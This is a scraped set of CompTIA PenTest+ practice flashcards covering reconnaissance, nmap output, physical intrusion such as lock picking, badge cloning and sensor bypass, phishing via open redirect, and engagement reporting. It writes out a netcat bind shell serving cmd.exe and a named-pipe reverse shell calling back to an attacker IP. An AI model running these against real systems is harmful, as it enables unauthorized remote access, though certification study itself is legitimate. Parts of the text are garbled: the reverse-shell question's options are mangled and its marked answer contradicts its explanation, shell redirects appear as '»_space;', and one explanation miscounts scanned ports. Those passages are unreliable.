CompTIA PenTest+ Certification PT0-001: Practice Test #1 (Total Seminars) Flashcards
A methodical approach to defeating a lock, which technique relies on interacting with a lock and its pins in series, addressing them in the order in which they bind the most when pressure is applied with a torque wrench? A.Tailgating B.Bumping C.Single pin picking D.Double ball
C.Single pin picking
Explanation
Correct Answer:
Single pin picking is correct. Single pin picking is a slower, more methodical approach to lockpicking that can produce great results, but is costly in terms of time required and the potential for exposure. Put simply, a lock is probed with a pick while tension is applied with a torque wrench; the pin that binds the most is lifted into a set position while the plug is rotated further, locking the driver pin in place. At this point, another pin begins to bind, making it the new target. This process repeats until all pins are set and the plug completes its turn, unlocking the lock.
Incorrect Answer:
Bumping is incorrect because “bumping” is a lock-picking technique that relies on the use of specially made “bump keys” and a tool called a bump hammer, which is used to “bump” the bump key while attempting to turn the plug; conventional wisdom considers it faster than single pin picking, but louder.
Double ball is incorrect because a double ball is a specific type of pick, rather than a picking technique. Ball and double ball picks are meant to be used when picking locks that use wafers as the main binding mechanism, rather than pins. This typically includes desks, file cabinets, and even some glove boxes in cars.
Tailgating is incorrect because tailgating is used to gain access to a facility after an authorized individual has legitimately opened an access point, rather than a direct attempt to defeat a security mechanism. Basic courtesies are in these situations a security flaw: people are too quick to hold a door open for a co-worker, or even someone who simply appears to belong where they are, in spite of the fact that security policies will typically dictate that employees must swipe their access badges every time they enter a controlled area.
This category of distributed DoS attack focuses on oversaturating server resources, with its severity measured in packets per second (Pps): A.Protocol attack B.ICMP flooding C.Application layer attack D.Volume-based attack
A.Protocol attack
Explanation
Correct Answer: Protocol attack is correct. A protocol attack is one that is focused on locking up a target system by consuming all available system resources, such as processing capability or memory. Attack severity is measured in packets per second, or Pps.
Incorrect Answers:
Application layer attack is incorrect because an application layer attack attempts to crash a specific service on a target system, rather than bring the entire system down by consuming its available CPU, memory, or storage assets. Application layer attacks are measured in requests per second, or Rps.
Volume-based attack is incorrect because a volume-based attack is one that attempts to consume a target’s available bandwidth (rather than system CPU cycles, memory, or storage), effectively knocking it offline. Volume-based attacks are measured in bits per second, or bps.
ICMP flooding is incorrect because ICMP flooding is a specific example of a volume-based attack, which is itself an incorrect answer. ICMP flooding is a denial of service attack method that focuses on consuming available network bandwidth by filling it with constant ICMP echo requests, effectively wasting bandwidth that would otherwise be used by legitimate traffic. Since these attacks do not target server CPU, memory, or storage resources, this answer is incorrect.
As defined by the OWASP Mobile Security Testing Guide, which core feature of iOS security architecture serves as a restricted area from which applications are executed? A.Sandbox B.Encryption and data protection C.Secure boot D.Hardware security
A.Sandbox
Explanation
Correct Answer:
Sandbox is correct. The sandbox is the restricted area where applications are executed. All applications are sandboxed from each other and core OS files, preventing spillage of information from both lateral means (that is, from another user app) and from higher levels of privilege (that is, from higher order operating system functions).
Incorrect Answer:
Hardware security is incorrect because the hardware security feature provides dedicated cryptographic hardware to secure the operation of the device. Through the use of two AES-256 encryption keys, the Group ID (or GID) and Unique ID (or UID), iOS devices prevent modification of firmware or physical tampering with components meant to bypass data protections.
Secure Boot is incorrect because Secure Boot (or more completely, the Secure Boot chain) employs an Apple-issued root certificate that is used to ensure a device has not been tampered with.
Encryption and data protection is incorrect because encryption, the use of passcodes, and other data protection mechanisms ensure data confidentiality by preventing unauthorized access to encrypted data.
Which command (valid in both *nix and Windows) can resolve a domain name to its IP address? A.'dig B.'nslookup' C.'host' D.'ping'
B.’nslookup’
Explanation
Correct Answer:
‘nslookup’ is correct. The nslookup command for both Windows and *nix systems that can query DNS servers to resolve a domain name to its associated IP address, and vice versa.
Incorrect Answers:
‘ping’ is incorrect because the ping command only sends ICMP packets to a host to confirm that it is reachable.
‘dig’ and ‘host’ are incorrect because although both dig and host are commands that can resolve a domain name to its IP address, they are only valid in *nix operating systems and are not recognized by default on Windows operating systems.
A proxy host should be configured as what type of proxy in proxychains to enable DNS queries to go through the proxy host's network? A.HTTP B.SOCK4 C.SOCKS5 D.DNS
C.SOCKS5
Explanation
Correct Answer:
SOCKS5 is correct. Configuration as a SOCKS5 proxy will allow proxychains to support both TCP and UDP protocols, including DNS.
Incorrect Answers:
DNS is incorrect because DNS proxies will only handle DNS queries and relay that information back to the requesting host or service. In addition, DNS proxies are not a type of proxy that can be configured in proxychains.
SOCKS4 is incorrect because a SOCKS4 proxy will only process TCP-based protocols such as SSH and HTTPS, making it unsuitable for support of UDP-based protocols such as DNS and SNMP.
HTTP is incorrect because HTTP proxies only support HTTP traffic, making them unsuitable not only for UDP-based protocol support, but also other TCP-based protocols, such as SSH and SMB.
Shodan and Censys are examples of \_\_\_\_\_\_\_\_\_\_, which enable secure discovery of publicly accessible Internet-connected devices. (Fill in the blank.) A.Maltego transforms B.Google Dorks C.Data miners D.IoT search engines
D.IoT search engines
Explanation
Correct Answer:
Internet of Things (IoT) search engines is correct. Shodan and Censys are examples of Internet of Things (IoT) search engines.
Google dorks is incorrect because a Google dork is a loaded search term that returns interesting sites, documents, or resources when entered into the Google search engine.
Maltego transforms is incorrect because Maltego transforms are external resources or APIs that expand the native capabilities of Maltego.
Data miners is incorrect because the term “data miners” is much broader than can be represented solely by “IoT search engines,” leaving this answer inadequate.
Consider the following nmap output: ``` # Ports scanned: TCP(10;21-23,25,80,110,139,443,445,3389) UDP(0;) SCTP(0;) PROTOCOLS(0;) Host: 10.1.2.3 () Status: Up Host: 10.1.2.3 () Ports: 21/open/tcp//ftp///, 22/open/tcp//ssh///, 23/open/tcp//telnet///, 25/open/tcp//smtp///, 80/open/tcp//http///, 110/closed/tcp//pop3///, 139/open/tcp//netbios-ssn///, 443/closed/tcp//https///, 445/open/tcp//microsoft-ds///, 3389/closed/tcp//ms-wbt-server/// OS: Linux 2.6.9 - 2.6.33 Seq Index: 198 IP ID Seq: All zeros # Nmap done at Sat May 12 09:41:47 2018 -- 1 IP address (1 host up) scanned in 14.49 seconds ``` Notice the OS declaration toward the bottom of the scan output. Given the body of output present, which of the following options was used to attempt OS fingerprinting? A.-O B.-sVC C.-Pn D.-A
A.-O
Explanation
Correct Answer:
-O’ is correct. The -O flag was used to provide OS fingerprinting here. Be careful with questions such as this one: while both the -O and -A flags will result in OS fingerprinting, the -A flag also calls all basic scripting checks to be run against the target for open ports. Since there is no NSE data embedded in the output, we can deduce that no flag was called that causes nmap to run NSE scripts.
Incorrect Answers:
‘-A’ is incorrect because although the -A flag also invokes the nmap scripting engine, there is no NSE data embedded in the output, so we can deduce that this flag was not called to cause nmap to run NSE scripts.
‘-sVC’ is incorrect because the -sVC flag causes both service identification and basic NSE scans but does not attempt fingerprinting.
-Pn is incorrect because the -Pn flag disables pings and skips host discovery.
During a penetration test, you secure a meeting with a middle manager and ask for a tour of their facility. During the tour, they fail to notice the RFID antenna hidden on your person, swiping authorization data from employee access cards. This is an example of which of the following? A.Scrubbing B.Shoulder surfing C.Piggybacking D.Badge Cloning
D.Badge Cloning
Explanation
Correct Answer:
Badge cloning is correct. Badge cloning is the practice of harvesting employee badge information usually with a high-gain RFID antenna for later replay attacks by writing it to a new access card.
Incorrect Answers:
Piggybacking is incorrect because piggybacking is a synonym for tailgating, a practice used to gain access to a facility after an authorized individual has legitimately opened an access point, such as by swiping an RFID badge to disengage a magnetic door lock, rather than a means of obtaining a functional copy of a working RFID badge.
Shoulder surfing is incorrect because shoulder surfing is the covert observance of individuals for the purpose of collecting sensitive information, and it has no need for the use of an RFID antenna.
Scrubbing is incorrect because scrubbing (sometimes referred to as “raking”) is a lock-picking technique performed by dragging a pick back and forth across the key pins in a lock while varying the tension used on the torque wrench, rather than a technique used to copy working RFID badges.
The ability of the harvester to identify hosts, IP addresses, and e-mail addresses based on a domain name alone makes it most valuable for which penetration testing methodology? A.Red team B.White box C.Gray box D.Black box
D.Black box
Explanation
Correct Answer:
Black box is correct. The ability to identify hosts, IP addresses, and e-mail addresses based on nothing more than a domain name means the harvester can be exceedingly valuable in penetration tests where one is provided little or no information. Because the black box testing methodology is marked by extremely limited starting information being provided to the tester, this is the correct answer.
Incorrect Answers:
Gray box and White box are incorrect because gray and white box testing both begin with some functional knowledge about the target environment. It should be noted that this does not mean the harvester is not useful during gray and white box engagements; it is simply that because the harvester excels at finding information with very little input, and because gray and white box assessments generally provide a significant amount of information to the penetration tester, the output of this tool will be less revealing in those engagements than it would in a black box assessment.
Red team is incorrect because red team testing is a type of penetration test, rather than a penetration testing methodology.
For which of the following situations would it be most fitting to recommend onboarding additional personnel as a mitigation measure?
A.The organization relies on hardware and operating systems that have been termed EOL by the vendor
B.The organizations network environment runs on a flat topography, with all assets relying on the 172.16.x.x/12 network for communication
C.The organization has fences to establish a perimeter boundary, but numerous, frequently moved shipping containers in the shipping area cause a number of blind spots in remote surveillance
D.System patches are applied at the whim of the owning manager, resulting in multiple disparate software version and OS distributions requiring support from the server support team
C.The organization has fences to establish a perimeter boundary, but numerous, frequently moved shipping containers in the shipping area cause a number of blind spots in remote surveillance
Explanation
Correct Answer:
The organization has fences to establish a perimeter boundary, but numerous, frequently moved shipping containers in the shipping staging area cause a number of blind spots in remote surveillance is correct. In the situation described, the organization has taken care to protect its boundaries with fencing and cameras, but the use case for a shipping yard results in blind spots in camera coverage. Of the choices given, this is the most appropriate situation to recommend additional personnel in response to the vulnerability present.
Incorrect Answers:
The organization’s network environment runs on a flat topography, with all assets relying on the 172.16.x.x/12 network for internal communication is incorrect because while additional personnel may be necessary to fix the issue, the core problem is not related to personnel issues. In this case, a flat network topography would be best fixed by a technological solution: properly segmenting networks via traditional subnetting and VLAN assignments.
System patches are applied at the whim of the owning manager, resulting in multiple disparate software versions and OS distributions requiring support from the server support team is incorrect because patches being applied at the say-so of the owner of a system or server is indicative of a lack of a patch management plan in the client environment rather than a lack of adequate personnel to deploy software and system patches; in this case, the core problem is procedural, and the implementation of an effective patch management plan would be the best recommendation for mitigation of the issue.
The organization relies on hardware and operating systems that have been termed EOL by the vendor is incorrect because reliance upon end-of-life (EOL) hardware and software is not a problem that can be solved by throwing personnel at it. Here, the core problem is technological in nature, and the acquisition of newer, vendor-supported hardware and software is the best recommendation for mitigation.
During the course of a penetration test, you discover that the credentials you were provided for a web application are invalid. Which of the following describes the best course of action in this scenario?
A.Consult the master service agreement to identify the client organizations named point of contact, and reach out too them for assistance in resolve the issue
B.Move on to another target in the engagement scope and note that the credentials were invalid in the penetration test report,
C.Consult the RoE to identify the client organizations named point of contact, and reach out to them for assistance in resolving the issue
D.Restrict all testing activities to those in an uncredentialed context and annotate the discrepancy in the penetration test report
C.Consult the RoE to identify the client organizations named point of contact, and reach out to them for assistance in resolving the issue
Explanation
Correct Answer:
Consult the RoE to identify the client organization’s named point of contact, and reach out to them for assistance in resolving the issue is correct. Any issues encountered during the execution of a penetration test should be communicated to the named point of contact as listed in the RoE.
Incorrect Answers:
Consult the master service agreement to identify the client organization’s named point of contact, and reach out to them for assistance in resolving the issue is incorrect because the communication escalation path listing points of contact is found in the RoE rather than in a master service agreement.Move on to another target in the engagement scope and note that the credentials were invalid in the penetration test report, preventing testing of the application and restrict all testing activities to those in an uncredentialed context, and annotate the discrepancy in the penetration test report are incorrect because failing to test an in-scope target (or limiting the testing conducted to only that which can be done outside of credentialed access) due to a relatively minor and easily corrected issue with the account credentials would be an abdication of duty on the part of a penetration tester. The point of contact is there to reduce friction and maximize the productivity of a penetration test leaving that resource untapped would be a failure on the part of the tester and diminish the overall quality of the penetration test.
Which command will establish a bound shell on a Windows host? Assume that the nc executable is in the present working directory, the attacking system IP address is 10.1.2.2, and the victim IP address is 10.1.4.4.
A.’nc.exed -nv 10.1.4.4 4444 -e :\Windows\System32\cmd.exe
B.’nc.exe -nvlp 10.1.4.4 4444 cmd.exe’
C.’nc.exe -nv 10.1.2.2. 4444 C:\Windows\System32\cmd.exe
D.’nc.exe -nvlp 4444 -e C:\Windows\System32\cmd.exe
D.’nc.exe -nvlp 4444 -e C:\Windows\System32\cmd.exe
Explanation
Correct Answer:
nc.exe -nvlp 4444 -e C:\Windows\System32\cmd.exe is correct. A bound shell requires at a minimum the -l and -p flags to establish a listener and designate the listening port, respectively, a port number, then the -e` flag and the command to execute through the netcat connection (in this case, Windows’ cmd.exe).
Incorrect Answers:
nc.exe -nv 10.1.2.2 4444 C:\Windows\System32\cmd.exe is incorrect because it is attempting to establish a reverse shell, as there is no -l or -p flag present to indicate that a listener is being established on the local host. In addition, this command would attempt to connect to a port on the Windows system itself, which would likely fail as there would not likely be any service listening on port 4444. This answer is also missing the -e flag, which is necessary before declaring the command to be executed across the netcat connection.
nc.exe -nvlp 10.1.4.4 4444 cmd.exe is incorrect because it attempts to establish a listener on the attacking system; this would be met with an error because the IP address 10.1.4.4 would not be available on the victim Windows host to bind a port. In addition, there is no -e flag before the cmd.exe call, which would produce a syntax error.
nc.exe -nv 10.1.4.4 4444 -e C:\Windows\System32\cmd.exe is incorrect because the command listed would provide a reverse shell to an established netcat listener on the attacking system at port 4444; as stated previously, bound shells require the -l and -p flags in addition to the -e flag.
In what section of a penetration test report would one expect to find a high-level overview of the results of the test, written specifically for nontechnical stakeholders? A.Methodology B.Conclusion C.E@xecutive summary D.Appendixes
C.E@xecutive summary
Explanation
Correct Answers:
Executive summary is correct. The executive summary is a less technical overview of the findings of a penetration test report, geared toward clearly communicating the findings to client personnel who may not have the background or training necessary to fully understand all the minutiae of the vulnerabilities discovered.
Incorrect Answers:
Conclusion is incorrect because the conclusion of a penetration test report consists of supplemental material that supports the findings of that penetration test, but it is not critical to understand its contents. This can consist of figures and illustrations, appendixes that contain the results of port scans, or other granular details used during the course of the test. As such, this is far from a nontechnical section of the report, and is therefore incorrect.
Methodology is incorrect because the methodology section of a penetration test report presents information regarding testing techniques and practices used as well as the decision-making processes that guided information collection, analysis, and risk evaluation. As this is far more in the weeds than would be appropriate for a nontechnical summary, it is incorrect.
Appendixes is incorrect because appendixes are a component of the conclusion of a penetration test report, and they detail the results of port scans, automated vulnerability scanners deployed in an effort to find low-hanging fruit, and other fine details. As stated previously, this is a much more detailed section of the penetration test report than is appropriate for nontechnical personnel, making this answer incorrect.
What is the function of an organization’s IT department in relation to a penetration test?
A.Patching systems before the penetration testers can launch exploits
B.Providing penetration testers with software tools needed for the assessment
C.Communications of security policies and remediation of incidental outages
D.Providing final, written authorization for penetration test
C.Communications of security policies and remediation of incidental outages
Explanation
Correct Answer:
Communication of security policies and remediation of incidental outages is correct. During a penetration test, an organization’s IT department serves to communicate security policies and remediate any incidents that may occur during the engagement.
Incorrect Answers:
Patching systems before the penetration testers can launch exploits is incorrect because patching systems is certainly within the traditional job scope of an IT department, but with respect to a penetration test it is expected that systems will not be subjected to any configuration changes or updates for the duration of the assessment.
Providing penetration testers with software tools needed for the assessment is incorrect because provisioning of tools required by the penetration testing team is outside of the duties of the IT department as well; although the IT department may coordinate or configure network or VPN access and necessary accounts for credentialed scanning, penetration testers should generally expect to bring their own tools to an engagement.
Providing final, written authorization for the penetration test is incorrect because the signing of the written authorization letter is a function expected of an organization’s executive management or legal personnel.
During a physical penetration test, you identify that a magnetic door designed to simplify employee egress from a secure area is rather easily defeated; warming up a sheet of paper by holding it close to your body and threading it through the crack between the doors is enough to trip the thermal sensor used to unlock the door from the inside. From here, it is possible to simply pull the door open. Of the following options, this is most likely an example of what? A.Lock bypass B.Lock picking C.Badge cloning D.Fence jumping
A.Lock bypass
Explanation
Correct Answer:
Lock bypass is correct. By tricking the system into thinking an employee is attempting to exit the secured area (through passing a heated sheet of paper through the sensor area of a thermal sensor), the lock is defeated. Because the lock was not interacted with in the manner expected by its manufacturer, this would be an example of a lock bypass.
Incorrect Answers:
Fence jumping is incorrect because fence jumping is used to obtain unauthorized access to an area that has been cordoned off. While this can be a way to get around a lock, a lock bypass specifically refers to unlatching the locking mechanism without interacting with it as intended by the manufacturer, making this answer incorrect.
Lock picking is incorrect because lock picking is a means of defeating physical locks that requires direct interaction with the locking mechanism in question.
Badge cloning is incorrect because badge cloning is the practice of harvesting employee badge information with a high-gain antenna for later replay attacks by writing this information to a new access card, and does not describe a means of defeating locks, directly or otherwise.
Per Microsoft's published threat modeling procedures, this step consists of a granular breakdown and analysis of the technologies used by an organization, marked by scrutiny of entry points (such as network ports or protocols) and trust boundaries between interconnected systems. A.Document the threats B.Decompose the application C.Rate the threats D.Identify threats
B.Decompose the application
Explanation
Correct Answers:
Decompose the application is correct. The definition provided best describes the third step of Microsoft’s threat modeling process decomposing the application. This step consists of a granular breakdown and analysis of the technologies used by an organization, marked by scrutiny of entry points (such as network ports or protocols) and trust boundaries between interconnected systems; the goal in this step is to develop a security profile that categorizes areas of the architecture that may be susceptible to a general type of vulnerability.
Incorrect Answers:
Identify threats is incorrect because identification of threats is the fourth step in Microsoft’s threat modeling framework and is marked by the categorization of external and internal threats to an organization. The determination of where threats are found, how they can be exploited, and the identification of agents capable of exploiting them are crucial steps that can greatly aid the process of bolstering an organization’s defense posture.
Rate the threats is incorrect because rating the threats is the last step and is often very subjective to the client and the type of environment. Threats are usually assigned a general threat value, such as high, medium, or low. This may be accompanied by a numeric value derived from a simple formula, such as Risk = (Probability) * (Damage Potential).
Document the threats is incorrect because documenting threats is the fifth step and consists of matching threats, threat actors, and vulnerabilities to possible targets within the organization’s own architecture.
A zone transfer is a reconnaissance technique that elicits information from what service? A.LLMNR B.HTTP C.DNS D.SFTP
C.DNS
Explanation
Correct Answers:
DNS is correct. DNS traditionally listens on UDP/53 for normal name resolution requests, but can also be configured to use TCP/53. Zone transfers are also performed exclusively over TCP/53, and while they have legitimate uses in setting up secondary DNS servers, they can also be used to obtain a wealth of information regarding an environment.
Incorrect Answers:
The other choices are incorrect. Zone transfers are not a feature of HTTP, LLMNR, or SFTP. HTTP is the unencrypted protocol used to serve and access websites and web applications. LLMNR is a protocol based on DNS that allows hosts to communicate with other hosts on the same local link without the need for a full DNS request. SFTP is the SSH-based secure implementation of the File Transfer Protocol, which is used to transfer files to and from target systems.
The `use` command in recon-ng is an alias for which other command? A.'search B.'set' C.'reload' D.'load'
D.’load’
Explanation
Correct Answer:
load’ is correct. The command use is an alias for the command load in recon-ng, making them functionally identical.
Incorrect Answers:
The other choices are incorrect because the commands reload, search, and set are not aliases for the command load.
The command reload is used to reload all modules, search allows a user to search through available modules, and set is used to configure module options.
Of the following options, which would the best indicator that a client has requested a red team penetration test?
A.The client has requested that testing take place outside of standard business hours
B.The client has requested an assessment with a longer than typical duration conducted in a manner consistent with a nation statement backed threat
C.The client requires all penetration testers to be US citizens
D.The client is a private aerospace company
B.The client has requested an assessment with a longer than typical duration conducted in a manner consistent with a nation statement backed threat
Explanation
Correct Answer:
The client has requested an assessment with a longer-than-typical duration conducted in a manner consistent with a nation-state-backed threat is correct. The request for an assessment that lasts longer than is typical and is to be conducted in a manner consistent with an attack from a nation-state-backed threat actor indicates that the client has requested a red team assessment.
Incorrect Answer:
The client is a private aerospace company is incorrect because the client’s status as a major aerospace corporation has no bearing on the type of assessment they require in a vacuum of further information.
The client requires all penetration testers to be U.S. citizens is incorrect because the requirement that all penetration testers be U.S. citizens is expected when compliance with export control regulations is a factor in the assessment.
The client has requested that testing take place outside of standard business hours is incorrect because the request that testing take place outside of standard business hours has no impact on the requirement to emulate the tactics and techniques of a nation-state-level threat.
Which ATT&CK matrix category describes techniques used to bypass detection or other network protection mechanisms? Specific examples include bypassing UAC and deploying rootkits. A.Lateral movement B.Defense evasion C.Internal access D>Persistence
B.Defense evasion
Explanation
Correct Answers:
Defense evasion is correct. Defense evasion techniques described in the ATT&CK matrix are ultimately aimed toward evading detection or other network defenses. In the examples provided, bypassing UAC allows attackers to execute commands in an administrative context on Windows systems without a UAC alert notifying users, while rootkits hide the presence of malware by intercepting core operating system calls that supply key system information.
Incorrect Answers:
Initial access is incorrect because initial access techniques are used to gain initial footholds into a target network. Examples of this include spearphishing and abuse of trusted relationships with outside organizations.
Lateral movement is incorrect because lateral movement techniques facilitate an attacker’s movement throughout a target organization’s network, allowing access to and control of additional systems. Examples of this include pass-the-hash and pass-the-ticket attacks.
Persistence is incorrect because persistence techniques consist of any access, action, or configuration changes that enable an attacker to ensure they can retain a presence on the system. Examples of this include modification of user .bash_profile files and new account creation.
During a physical penetration test, you see a user entering their username and password on a company intranet web application while you glance over from behind as they type. What is this an example of? A.Shoulder surfing B.Baiting C.Pretexting D.Interrogation
A.Shoulder surfing
Explanation
Correct Answer:
Shoulder surfing is correct. Shoulder surfing is the covert observance of individuals geared toward the collection of sensitive information.
Incorrect Answers:
Pretexting is incorrect because pretexting is the creation of a reason-a pretext-for the penetration tester to be in a given place or to be asking for something.
Interrogation is incorrect because interrogation is the use of carefully asked questions to elicit information from a target.
Baiting is incorrect because baiting is a motivating factor defined by its use of means that tempt or entice a target into performing a given action.
During preparation for a phishing campaign, you identify a critical business web application that does not verify the target of a redirect included in an HTTP GET parameter. You choose to create links that route to the legitimate web service but redirect to your attacking system where you are hosting a cloned version of the application's login page that will harvest user credentials. This is an example of what type of vulnerability? A.Unauthorized API Use B.Reflected XSS C.HTTP parameter pollution D.Unvalidated redirectrion
D.Unvalidated redirection
Explanation
Correct Answer:
Unvalidated redirection is correct. Unvalidated redirection occurs when untrusted input is accepted by a web application in such a way that it can cause a visitor to be redirected to another site. If an attacker leverages this and links to a malicious site of their own creation, this attack could be a critical component of a successful phishing campaign, as phishing victims are more likely to trust a link that appears to be part of a site they visit frequently.
Incorrect Answers:
Reflected XSS is incorrect because reflected XSS would require a user to be tricked into clicking a malicious link that sends the payload (typically a snippet of JavaScript that steals the user’s session token or gets them to download a malicious file) to the web server; the web server then does nothing with this payload but feed it back to the victim, without storing it locally. In this instance, a malicious link is crafted and sent directly to the user, after which the intended site is loaded before redirecting the visitor to a cloned site under the attacker’s control for the purpose of harvesting credentials. As such, this answer is incorrect.
HTTP parameter pollution is incorrect because HTTP parameter pollution would require the attacker to fuzz the target web server with HTTP requests that have multiple instances of the same HTTP parameter, rather than sending a malicious link to the victim, as in the example. Recall that HTTP parameter pollution is a type of application fuzzing that specifically tests how a website handles multiple HTTP parameters with the same name. Different web servers will handle multiple identically named HTTP parameters differently, and the results of parameter pollution can range from simple error messages to authentication or input validation bypasses.
Unauthorized API use is incorrect because unauthorized API use would involve the use of a feature or interface not intended for typical end users. In this case, a standard feature (an HTTP redirect) is abused due to a lack of sanitization of user input before the redirect is processed, making this answer incorrect as well. As a refresher, unauthorized or unexpected API use can come up for numerous reasons: developers may have left a feature enabled when pushing an application into an environment, development and production environments may not be properly segregated, or developers and administrators may just find it convenient to have the functionality of the API in question available at all times.
The HIPAA regulatory framework applies for what type of organization?
A.Hospitals, health clinics and other organizations that store patients personal health information, opr PHI
B.Stores retailers that accept credit or debit cards as a means of payment for goods and services
C.US governments agencies, or organizations that do business with the US government
D.Power companies, water companies and other organizations that provide public utilities
A.Hospitals, health clinics and other organizations that store patients personal health information, opr PH
Explanation
Correct Answer:
Hospitals, health clinics, and other organizations that store patients’ personal health information, or PHI is correct. HIPAA regulations-those imposed by the Health Insurance Portability and Accountability Act-apply to hospitals, health clinics, and other organizations that must store the personal health information of their patients.
Incorrect Answers:
Stores and retailers that accept credit or debit cards as a means of payment for goods and services is incorrect because stores, retailers, and other organizations that accept debit or credit cards as a means of payment are subject to PCI DSS regulations.
U.S. government agencies, or organizations that do business with the U.S. government is incorrect because U.S. government agencies and organizations that do business with the U.S. government are subject to the FISMA regulatory framework.
Power companies, water companies, and other organizations that provide public utilities is incorrect because power and water companies and other public utilities do not have a dedicated regulatory framework for their security, but they may adhere to FISMA or other state or local guidelines as mandated by the appropriate legal authorities.I
During a penetration test, you obtain a reverse shell on a system by uploading a malicious .war file to a Tomcat server and then establish persistence by adding a startup service that establishes a bound root shell on port 31173. During enumeration of the system, you determine that a local user account is using its username as its password, and that the same user has scripts with hardcoded credentials stored in their home directory. Which of the following actions should be taken as part of the post-engagement cleanup for this server? (Choose two.)
A.Change the users password to a more secure, randomly generated string and notify them via e-mail
B.Delete the lines of text containing an account credentials in the script found in the user’s home directory
C.Remove of the malicious .war file
D.Delete the startup service that establishes the bound shell
C.Remove of the malicious .war file
D.Delete the startup service that establishes the bound shell
Explanation
Correct Answers:
Remove of the malicious .war file and Delete the startup service that establishes the bound shell are correct. When leaving a tool or file in place would expose a client to additional risk, it is a best practice to make all efforts to remove it whenever possible. These answers are the best possible examples of this in the given choices.
Incorrect Answers:
Change the user’s password to a more secure, randomly generated string and notify them via e-mail and Delete the lines of text containing account credentials in the scripts found in the user’s home directory are incorrect. The poor password and insecurely stored passwords found in the user’s scripts are examples of issues that existed at the beginning of the engagement. While it is appropriate to write these issues up as separate findings in the penetration test report, the onus is on the client to remedy these security shortcomings.
Single sign-on (SSO) architectures enhance system simplicity by allowing services requiring authentication to effectively delegate trust to another central system, relying on that system’s affirmation that a user is both identified correctly and authorized for the service they want to use. Which of the following is not an example of an SSO-enabling identity protocol?
A.Active Directory Federated Services (ADFS)
B.OpenID
C.SELinux
D.OAuth
C.SELinux
Explanation
Correct Answer:
SELinux is correct. SELinux is a security module that facilitates access control policies in Linux operating systems.
Incorrect Answers:
The other choices are incorrect because Oauth, OpenID, and Active Directory Federated Services (ADFS) are all identity protocols that enable deployment of SSO in a given network environment.
Consider an /etc/hosts file with hundreds of entries similar to the following:
10.10.1.2 host.domain.com hostOf the following options, which would be the best choice to create a text file containing a list of IP addresses?
A.’awk{‘print$1’] /etc/hosts»ips.txt
B.’grep -v domain.com /etc/hosts»_space;ips.txt
C.’awk{‘print$2|/etc/hosts > ips.txt’
D.’grep 10./etc/hosts»_space; ips.txt’
A.’awk{‘print$1’] /etc/hosts»ips.txt
Explanation
Correct Answer:awk {'print $1'} /etc/hosts >> ips.txt is correct. The print function in awk can be used to extract specific columns of text as delineated by whitespace (that is, spaces or tabs), or by any other delimiter character when used with the -F flag. The»_space; operator is used to concatenate output to the named file rather than overwrite the entire file each time matching data is found.
Incorrect Answers:grep 10. /etc/hosts >> ips.txt is incorrect because the use of grep would pull the entire line any time a match for “10.” was found, rather than just the IP address in question.
awk {'print $2'} /etc/hosts > ips.txt is incorrect because the use of {'print $2'} in awk would print the second field of text usually a hostname or FQDN in a hosts file rather than the IP addresses.
‘grep -v domain.com /etc/hosts»_space; ips.txt is incorrect because the use of grep would pull whole lines rather than individual fields of data before feeding them into the text file. In addition, the -v` flag would provide matches for all lines that did not contain the string “domain.com”, leaving only lines which did not contain an FQDN.
During a penetration test, you have obtained low privilege command execution via web application command injection on a target system where the installed version of netcat does not support the -e option. You elect to establish a reverse shell using a named pipe. The target IP address is 10.1.2.6, your attacking IP address is 10.1.2.2, and you have established a netcat listener with the command nc -nvlp 4444. Select the answer that will complete the command sequence to obtain a reverse shell callback.```mknod /tmp/fifo p; /bin/sh -c “/bin/sh 0/tmp/fifo’
B.’nc 10.1.2.2 44441> /tmp/info
C.’1>/tmp/fifo > nc 10.1.2.2.4444’
D.’nc 10.1.2.6 4444 1>/tmp/fifo’
B.’nc 10.1.2.2 44441> /tmp/info
Explanation
Correct Answer:
nc 10.1.2.2 4444 1>/tmp/fifo is correct. It takes the standard output (STDOUT, file descriptor 1) of the netcat connection (that is, commands sent by the attacker, since this is on the target system) and feeds it back into the named pipe, completing the reverse shell.
Incorrect Answers:
nc 10.1.2.2 4444 2>/tmp/fifo is incorrect because it would feed the STDERR output of the netcat instance to the named pipe, resulting in nothing being fed to the /bin/sh instance unless there was an error in the netcat command (which would immediately close with a nonzero exit code).
1>/tmp/fifo > nc 10.1.2.2 4444 is incorrect for a number of reasons: The STDOUT redirect is at the beginning of the line, which would place it directly after the named pipe. This is incorrect because the output redirect needs to go from the netcat connection to the named pipe. In addition, this configuration would dump the contents of /tmp/fifo to a file named “nc” in the current working directory, then fail when attempting to execute a command named
“10.1.2.2”. nc 10.1.2.6 4444 1>/tmp/fifo is incorrect because it attempts to establish an nc connection to the victim node that is, the victim is attempting to call itself rather than the attacking system. Since there would be no callback, there would be no reverse shell, making this answer incorrect.
Before beginning a physical penetration test, you decide to craft a persona wherein you are an electrician who has been asked to perform an inspection of the electrical panel and related systems for a client's building. What is this an example of? A.Interrogation B.Waterholing C.Pretexting D.Baiting
C.Pretexting
Explanation
Correct Answer:
Pretexting is correct. The crafting of a persona that is assumed during a social engineering effort-whether in person, over the phone, or via e-mail-is pretexting. It revolves around creating a reason-a pretext-for the penetration tester to be in a given place or to be asking for something.
Incorrect Answers:
Baiting is incorrect because baiting is a motivating factor defined by its use of means that tempt or entice a target into performing a given action.
Waterholing is incorrect because waterholing is the use of a trusted site to house a malicious payload.
Interrogation is incorrect because interrogation is the use of carefully asked questions to elicit information from a target.
Consider the following nmap output: ``` Nmap scan report for 10.1.2.3 Host is up (0.00034s latency). Not shown: 389 closed ports PORT STATE SERVICE 22/tcp open ssh 23/tcp open telnet 25/tcp open smtp 53/tcp open domain 80/tcp open http 111/tcp open rpcbind 139/tcp open netbios-ssn 445/tcp open microsoft-ds 2049/tcp open nfs 5432/tcp open postgresql 5900/tcp open vnc Read data files from: /usr/bin/../share/nmap # Nmap done at Sat May 12 08:18:18 2018 -- 1 IP address (1 host up) scanned in 0.05 seconds ``` Based on this output, which of the following would have been a declared flag for this scan? A.'--top-ports=11' B.'-sV' C.'--top-ports=400' D.'-sU'
C.’–top-ports=400’
Explanation
Correct Answer:
--top-ports=400 is correct. The correct answer is --top-ports=400. The clue here is in the total count of ports listed as scanned; 11 open ports shown plus 389 closed ports not shown would mean that only 200 ports were probed in this scan.
Incorrect Answers:
--top-ports=11 is incorrect because --top-ports=11 would only account for the 11 open ports, and not the additional 389 ports that were scanned but found to not be open.
‘-sV’ is incorrect because the -sV flag is used to perform service identification in an nmap scan.
‘-sU’ is incorrect because the -sU flag is used to trigger UDP scanning of the target in question.`
